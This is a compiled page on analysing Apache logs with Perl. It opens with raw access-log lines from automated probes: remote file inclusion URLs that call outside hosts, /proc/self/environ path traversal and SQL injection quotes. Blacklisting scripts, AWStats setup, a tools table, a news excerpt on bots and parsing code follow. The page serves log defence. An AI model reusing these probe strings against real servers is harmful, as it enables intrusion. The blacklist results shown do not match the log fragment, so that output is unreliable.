"-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /Scripting/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:07 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 109.86.145.204 - - [16/Aug/2010:09:48:06 -0600] "GET /Malware/Malicious_web/Bulletin/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /Malware/Malicious_web/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810" 109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 74.8.102.118 - - [16/Aug/2010:10:10:24 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.7dev.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? 
HTTP/1.1" 302 826 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /Solaris/oss_for_solaris.shtml/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /Solaris/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 767 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:37 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? 
HTTP/1.1" 500 767 "-" "libwww-perl/5.65" 203.147.62.92 - - [16/Aug/2010:12:21:15 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:51 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.shtml/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 77.243.239.121 - - [16/Aug/2010:12:41:05 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:06 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:36 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET 
/400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET 
//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:38 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:43:40 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:43:41 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
One thing common to such records is the use of libwww-perl as the user agent. Grepping for the string libwww gives a more complete picture. Generally these are "blind probes" used by script kiddies to detect some exploitable vulnerability.
Extracting the IP addresses gives you a first draft of a "blacklist", and the top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe, which can be made into a function or shell script:
grep libwww $1 | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -12 > $1.dirty
Below are the results of processing the log fragment shown above:
 20 83.149.125.174   home.w-sieci.pl
 18 80.67.20.21      mayermail.de
 12 200.69.222.122   contactar01.gestionarnet.com
 11 64.78.163.2      nickentgolf.com
 11 62.193.224.166   wpc0230.amenworld.com
 10 86.109.161.201   lincl239.ns1.couldix.com
  9 87.230.2.113     lvps87-230-2-113.dedicated.hosteurope.de
  9 85.214.55.73     mind-creations.net
  7 193.192.249.157
  6 87.118.96.254    ns.km22206-02.keymachine.de
  6 72.55.153.108    ip-72-55-153-108.static.privatedns.com
  6 66.147.239.104   host.1sbs.com
  6 216.246.52.59    server.dynasoft.com.ph
  6 213.195.77.225   225.77.195.213.ibercom.com
  5 217.115.197.51   node11.cluster.nxs.nl
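The resulting list can then be turned into blocking rules. Here is a minimal sketch that assumes Apache 2.2-style Deny directives and the .dirty file produced by the pipe above (file names and the include path are illustrative, not prescriptive):

#!/usr/bin/perl -w
# dirty2deny.pl -- turn "count IP [hostname]" lines into Apache "Deny from" rules
use strict;

while (<>) {
    my ($count, $ip) = /^\s*(\d+)\s+(\d+\.\d+\.\d+\.\d+)/ or next;
    print "# $count libwww hits\n";
    print "Deny from $ip\n";
}

Typical use: perl dirty2deny.pl access_log.dirty > blacklist.conf, and include blacklist.conf from your Apache configuration.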
There are a lot of free HTTP log file analysis tools written in Perl out there that haven't been updated since the mid 90's. However, AWStats is one of the few well-written scripts that is both free and up to date.
It looks a bit like WebTrends (though I haven't used WebTrends in several years). AWStats can be used on several web servers, including IIS and Apache. You can either have it generate static HTML files, or run it as a Perl script in the cgi-bin.
Here's a quick rundown of setting it up on unix/apache
Each virtual web site you want to track stats for should have a file /etc/awstats.sitename.conf. The directives for the configuration file are documented at http://awstats.sourceforge.net/docs/awstats_config.html; the distribution also provides a default conf file in cgi-bin/awstats.model.conf which you can use as a base.
Make sure your log files use the NCSA combined format. In Apache this is usually done with CustomLog /logs/access.log combined. You can use other formats, but then you have to customize the conf file.
You will probably want to edit the LogFile directive to point to where your logfile is stored. SiteDomain is the main domain of the site, HostAliases lets you put in other domains for the site, and the DirData directive lets you specify where the AWStats databases will be stored (each site will have its own file in that directory). A small fragment is sketched below.
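For illustration only (the paths and domain below are hypothetical, not prescriptive), the relevant fragment of /etc/awstats.sitename.conf might look like this:

LogFile="/var/log/httpd/access_log"
SiteDomain="sitename.com"
HostAliases="www.sitename.com localhost 127.0.0.1"
DirData="/var/lib/awstats"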
Once that is set up, you will want to update the database. This is done from the command line by running:
perl awstats.pl -config=sitename -update
Now copy everything in the wwwroot folder to a web root, and visit http://sitename.com/cgi-bin/awstats.pl. If you want to view other domains, use /cgi-bin/awstats.pl?config=othersitename
Where sitename would be the name of your config file awstats.sitename.conf
If you want to generate static html files run the awstats_buildstaticpages.pl script found in the tools folder. You have to give it the path to the awstats.pl perl script, and a directory to put the static html files in.
perl awstats_buildstaticpages.pl -config=sitename -awstatsprog=/web/cgi-bin/awstats.pl -dir=/web/stats/sitename/
More setup info can be found here: http://awstats.sourceforge.net/docs/index.html
If you are looking for a Squid log analyzer written in Perl, Calamaris is one option to try. See also Proxy log analysers.
There are plenty of simple Perl scripts for log processing on the Web nowadays. See for example Unix Log Analysis.
Name | Platform | Cost | Available from | Notes |
---|---|---|---|---|
3Dstats | UNIX | free | Netstore | |
Analog | Mac, Windows, Unix | free | http://www.analog.cx/ Mac version also available from summary.net | |
BrowserCounter | UNIX | free | Benjamin "Snowhare" Franz | |
eXTReMe Tracking | Any (online service) | Free | eXTReMe Tracking | Unique visitors, referrers, browser, geographical location... No traffic limitation |
FTPWebLog | UNIX | free | Benjamin "Snowhare" Franz | |
iisstat | UNIX | free | Lotus Development Corporation | |
pwebstat | Unix (requires perl5 + fly) | free | Martin Gleeson | |
RefStats | UNIX | free | Benjamin "Snowhare" Franz | |
Relax | Unix, Windows | free (GPL) | ktmatu | Perl 5 script for referrer and search engine keyword analysis. |
Webalizer | Unix | free (GPL) | Bradford L Barrett | Supports common logfile format & variations of combined logfile format, partial logs & multiple languages. |
wwwstat | UNIX | free | Roy Fielding | |
W3Perl | Unix, Windows | free (GPL) | Laurent Domisse | |
Bots Now Outnumber Humans on the Web
By ROBERT MCMILLAN
Dec 18 2014
http://www.wired.com/2014/12/bots-now-outnumber-humans-web/

Diogo Mónica once wrote a short computer script that gave him a secret weapon in the war for San Francisco dinner reservations.
This was early 2013. The script would periodically scan the popular online reservation service, OpenTable, and drop him an email anytime something interesting opened up - a choice Friday night spot at the House of Prime Rib, for example. But soon, Mónica noticed that he wasn't getting the tables that had once been available.
By the time he'd check the reservation site, his previously open reservation would be booked. And this was happening crazy fast. Like in a matter of seconds. "It's impossible for a human to do the three forms that are required to do this in under three seconds," he told WIRED last year.
Mónica could draw only one conclusion: He'd been drawn into a bot war.
Everyone knows the story of how the world wide web made the internet accessible for everyone, but a lesser known story of the internet's evolution is how automated code, aka bots, came to quietly take it over. Today, bots account for 56 percent of all website visits, says Marc Gaffan, CEO of Incapsula, a company that sells online security services. Incapsula recently ran an analysis of 20,000 websites to get a snapshot of part of the web, and on smaller websites, it found that bot traffic can run as high as 80 percent.
People use scripts to buy gear on eBay and, like Mónica, to snag the best reservations. Last month, the band Foo Fighters sold tickets for their upcoming tour at box offices only, an attempt to strike back against the bots used by online scalpers. "You should expect to see it on ticket sites, travel sites, dating sites," Gaffan says. What's more, a company like Google uses bots to index the entire web, and companies such as IFTTT and Slack give us ways to use bots for good, personalizing our internet and managing the daily informational deluge.
But, increasingly, a slice of these online bots are malicious, used to knock websites offline, flood comment sections with spam, or scrape sites and reuse their content without authorization. Gaffan says that about 20 percent of the Web's traffic comes from these bots. That's up 10 percent from last year.
Often, they're running on hacked computers. And lately they've become more sophisticated. They are better at impersonating Google, or at running in real browsers on hacked computers. And they've made big leaps in breaking human-detecting captcha puzzles, Gaffan says.
"Essentially there's been this evolution of bots, where we've seen it become easier and more prevalent over the past couple of years," says Rami Essaid, CEO of Distil Networks, a company that sells bot-blocking software.
But despite the rise of these bad bots, there is some good news for the human race. The total percentage of bot-related web traffic is actually down this year from what it was in 2013. Back then it accounted for 60 percent of the traffic, 4 percent more than today.
Now that the hostname lookups are taken care of, it's time to write the log-analysis script. Example 8-2 shows the first version of that script.
Example 8-2: log_report.plx, a web log-analysis script (first version)
#!/usr/bin/perl -w
# log_report.plx
# report on web visitors
use strict;
while (<>) {
my ($host, $ident_user, $auth_user, $date, $time,
$time_zone, $method, $url, $protocol, $status, $bytes) =
/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] "(\S+) (.+?) (\S+)" (\S+) (\S+)$/;
print join "\n", $host, $ident_user, $auth_user, $date, $time,
$time_zone, $method, $url, $protocol, $status,
$bytes, "\n";
}
This first version of the script is simple. All it does is read in lines via the <> operator, parse those lines into their component pieces, and then print out the parsed elements for debugging purposes. The line that does the printing is interesting, in that it uses Perl's join function, which you haven't seen before. The join function is the polar opposite, so to speak, of the split function: it lets you specify a string (in its first argument) that will be used to join the list comprising the rest of its arguments into a scalar. In other words, the Perl expression join '-', 'a', 'b', 'c' would return the string a-b-c. And in this case, using \n to join the various elements parsed by our script lets us print out a newline-separated list of those parsed items.
You could theoretically have as many text files as you want as command-line arguments, but so far I haven't gotten that part to work. I just have:
./logprocess.pl monster.log   # monster.log is the file that contains the entries
then in the code, assume all variables not specified have been declared as scalars
my $x = 0;
my @hashstuff;
my $importPage = $ARGV[0];
open(my $fh, '<', $importPage) or die "Cannot open $importPage: $!";   # read the file (backticks would try to execute it)
foreach my $line (<$fh>) {
    my ($ipaddy, $date, $time, $method, $url, $httpvers,
        $statuscode, $bytes, $referer, $useragent) =
        $line =~ m#^(\d+\.\d+\.\d+\.\d+) \S+ \S+ \[(\d+/\S+/\d+):(\d+:\d+:\d+) [^\]]+\] "(\S+) (\S+) (\S+)" (\d+) (\d+|-) "([^"]*)" "([^"]*)"#;
    next unless defined $ipaddy;    # skip lines that do not match the pattern
    my %info = ('ipaddy' => $ipaddy, 'date' => $date, 'time' => $time,
                'method' => $method, 'url' => $url, 'httpvers' => $httpvers,
                'statuscode' => $statuscode, 'bytes' => $bytes,
                'referer' => $referer, 'useragent' => $useragent);
    $hashstuff[$x] = \%info;        # store a reference; assigning %info itself would not keep the hash
    $x++;
}
close($fh);
Listing 21.1 - 21LST01.PL - Read the Access Log and Parse Each Entry

#!/usr/bin/perl -w
$LOGFILE = "access.log";
open(LOGFILE) or die("Could not open log file.");
foreach $line (<LOGFILE>) {
    ($site, $logName, $fullName, $date, $gmt,
     $req, $file, $proto, $status, $length) = split(' ', $line);
    $time = substr($date, 13);
    $date = substr($date, 1, 11);
    $req  = substr($req, 1);
    chop($gmt);
    chop($proto);
    # do line-by-line processing.
}
close(LOGFILE);
ktmatu's Log tools - three of them (descriptions from their page):
Relax - WWW logfile referring URL and search engine keyword analysis tool. This free Perl script recognizes many search engines and organizes popular keywords used to get to your site.
Lrdns - Log Reverse Domain Name System converts numeric IP addresses in access log files into textual domain names. Written in Perl.
Ffcat - Prints only the new entries in a log file. Fast forwards to the position where the last run ended, and then copies only the new lines of that file to the standard output. Written in Perl.
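The idea behind Ffcat is simple enough to sketch in a few lines of Perl. The sketch below is not ktmatu's code, and the state-file naming convention is an assumption made for the example:

#!/usr/bin/perl -w
# ffcat-like sketch: print only the lines appended to a log since the last run
use strict;

my $log   = shift or die "usage: $0 logfile\n";
my $state = "$log.offset";                 # where we remember how far we got last time (assumed name)

my $offset = 0;
if (open my $s, '<', $state) { $offset = <$s> + 0; close $s; }

open my $fh, '<', $log or die "cannot open $log: $!";
$offset = 0 if $offset > -s $log;          # the log was rotated or truncated: start from the beginning
seek $fh, $offset, 0;                      # fast-forward to where the last run ended
print while <$fh>;                         # copy only the new lines to standard output

open my $out, '>', $state or die "cannot write $state: $!";
print $out tell($fh), "\n";                # remember the new end-of-file position
close $out;
close $fh;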
The following is a web log analyzer written in Perl for Apache log files. Currently, four options can (should) be given when invoking the script: -n <number> prints the top <number> accessed documents, -r shows the referrers, -f shows which hosts the visits came from, and -t <number> limits the referrer and host lists to the top <number> entries.
#!/usr/bin/perl -w
use strict;
use Getopt::Std;

open (LOG, "/var/log/httpd/adp-gmbh/xlf_log");   # log file path is hard-coded

my $options = {};
# n  how many urls?
# r  print referers?
# f  print from (which hosts)?
getopts("n:rfht:", $options);

my $methods = {};
my $urls    = {};

if ($options->{h}) {
    print "options:\n";
    print "  -n <n>  print the top n visited urls\n";
    print "  -r      show referrers\n";
    print "  -f      show who has visited (f = from)\n";
    print "  -t <n>  show top <n> referrers and froms only\n";
    print "\n";
    exit;
}

my $ignoreHosts = {
    "xxx.yy.zzz.aaa" => {},
};

my $countGiven = 0;
$countGiven = 1 if defined $options->{n};

while (my $line = <LOG>) {
    my ($host,$date,$url_with_method,$status,$size,$referrer,$agent) =
        $line =~ m/^(\S+) - - \[(\S+ [\-|\+]\d{4})\] "(\S+ \S+ [^"]+)" (\d{3}) (\d+|-) "(.*?)" "([^"]+)"$/;
    next unless $date =~ m#\d{1,2}/Feb/2002#;    # note: only February 2002 is analyzed
    print $line unless $url_with_method;
    my ($method, $url, $http) = split /\s+/, $url_with_method;
    $url      =~ s/\?(.*)//;
    $referrer =~ s/\?(.*)//;
    push @{$methods->{$method}}, $url;
    $urls->{$url}->{host}->{$host}++;
    $urls->{$url}->{count}++;
    $urls->{$url}->{referrer}->{$referrer}++;
}

foreach my $m (keys %{$methods}) {
    print "$m : " . @{$methods->{$m}} . "\n";
}

my $nofUrls = 0;
foreach my $url (sort {$urls->{$b}->{count} <=> $urls->{$a}->{count}} keys %{$urls}) {
    printf "%5d %s\n\n", $urls->{$url}->{count}, $url;
    my @linesOut;
    if ($options->{f}) {
        my $currentLine = 0;
        printf " %6s%-35s", " ", "hosts";
        foreach my $host (sort {$urls->{$url}->{host}->{$b} <=> $urls->{$url}->{host}->{$a}} keys %{$urls->{$url}->{host}}) {
            last if $currentLine > $options->{t};
            $linesOut[$currentLine] .= sprintf " %5d %-35.35s", $urls->{$url}->{host}->{$host}, $host;
            $currentLine++;
        }
    }
    if ($options->{r}) {
        my $currentLine = 0;
        printf " %6s%-55s", " ", "referrers";
        foreach my $referrer (sort {$urls->{$url}->{referrer}->{$b} <=> $urls->{$url}->{referrer}->{$a}} keys %{$urls->{$url}->{referrer}}) {
            last if $currentLine > $options->{t};
            $linesOut[$currentLine] .= sprintf " %5d %-55.55s", $urls->{$url}->{referrer}->{$referrer}, $referrer;
            $currentLine++;
        }
    }
    print "\n";
    foreach my $line (@linesOut) {
        print "$line\n";
    }
    print "\n";
    if ($countGiven) {
        last if $nofUrls >= $options->{n};
    }
    $nofUrls++;
}
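A typical run (the script file name here is arbitrary, since the listing above hard-codes its log file path rather than taking one as an argument) would be:

perl weblog_report.pl -n 10 -r -f -t 5

This prints the ten most requested URLs, and for each of them the top referrers and visiting hosts, limited by the -t option.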
What's so special about this program?

When we started out writing this program, people asked us "why write yet another statistics program for your weblog when there are dozens of them for free on the web, including all possible reports and analyses?"
True, but we don't need a program that generates 12-page reports about everything that can possibly be found in the logs. We need to monitor, daily, a handful of important aspects and trends of our site's traffic. We don't want them buried in pages and pages of other, mostly useless, information. We wanted a program that would show what we thought was important. So we made it, and we decided to also offer it for free here. Perhaps you're interested in watching some figures that this program doesn't cover; there are so many free web log analysis programs that we're sure you'll find a suitable one for your site. Otherwise, the trends that we watch with this program are pretty much the most essential and informative ones, and you should definitely have a program to investigate them.
Features
- Monthly/Daily reports - helps you spot trends both short and long term. Watch day-by-day statistics to see how your site's traffic, sources of visitors and search engine success fluctuate throughout the week. Have a look at the monthly summary to see how you're growing by the day. Look back on your site's history in the global all-time report.
- Traffic breakdown per document - find out how much traffic each single document on your site receives.
- Referer log analysis - see all pages that referred visitors to your site, ranked by the amount of traffic they generated.
- Gateway analysis - Which pages are the first that visitors see in your site? See where they enter from, to get an idea of what subjects bring you the most traffic, and what your visitors are looking for.
- Multiple Logs - Even if your site is being delivered by multiple web servers (as is usually the case with mod_perl enabled sites) the program can keep track of multiple logs and merge the data appropriately.
- Fast - Munches logs at speeds close to 3000 lines per second on a PentiumII-class machine.
Requirements
This program works with the plain or combined logs that the Apache web server generates. You might get IIS to generate a compatible log, but I won't get into that. Other than that, all you need is perl (and reliable webhosting) to run it.

Download

